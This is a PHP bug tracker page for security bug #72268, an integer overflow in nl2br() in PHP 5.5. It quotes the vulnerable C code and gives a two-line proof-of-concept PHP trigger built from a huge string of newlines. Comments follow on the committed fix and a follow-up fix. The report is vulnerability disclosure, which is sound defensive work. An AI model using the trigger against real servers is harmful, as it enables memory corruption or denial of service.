|  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #72268 Integer Overflow in nl2br()
Submitted: 2016-05-26 15:53 UTC Modified: 2016-07-07 09:34 UTC
From: taoguangchen at icloud dot com Assigned: stas (profile)
Status: Closed Package: *General Issues
PHP Version: 5.5.36 OS:
Private report: No CVE-ID: None
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If this is not your bug, you can add a comment by following this link.
If this is your bug, but you forgot your password, you can retrieve your password here.
Bug Type:
From: taoguangchen at icloud dot com
New email:
PHP Version: OS:


 [2016-05-26 15:53 UTC] taoguangchen at icloud dot com
	/* in brief this inserts <br /> or <br> before matched regexp \n\r?|\r\n? */
	char		*tmp, *str;
	int		new_length;
	char		*end, *target;
	int		repl_cnt = 0;
	int		str_len;
	zend_bool	is_xhtml = 1;

	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|b", &str, &str_len, &is_xhtml) == FAILURE) {
		size_t repl_len = is_xhtml ? (sizeof("<br />") - 1) : (sizeof("<br>") - 1);

		new_length = str_len + repl_cnt * repl_len; // ==> integer overflow
		RETURN_STRINGL(tmp, new_length, 0);


ini_set('memory_limit', -1);
$str = nl2br(str_repeat("\n", 0xffffffff/14+1));


checking new_length


Add a Patch

Pull Requests

Add a Pull Request


AllCommentsChangesGit/SVN commitsRelated reports
 [2016-06-16 04:53 UTC]
-Assigned To: +Assigned To: stas
 [2016-06-16 04:53 UTC]
See bug #72403
 [2016-06-21 06:53 UTC]
-Status: Assigned +Status: Closed
 [2016-06-21 06:53 UTC]
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at

 For Windows:
Thank you for the report, and for helping us make PHP better.

 [2016-07-06 16:03 UTC] php-e1b at deemzed dot uk
The fix for bug #72268 has not made it into the official PHP 5.5.37, PHP 5.6.23 releases as indicated by announce/in the changelogs, PHP_FUNCTION(nl2br):

        int             new_length;
 [2016-07-07 09:34 UTC]
A follow up fix is in the scope of bug #72403, see 25bd11cf271f801efa346195d540f3d8e3bcb0ef.

PHP Copyright © 2001-2018 The PHP Group
All rights reserved.
Last updated: Wed Sep 19 20:01:27 2018 UTC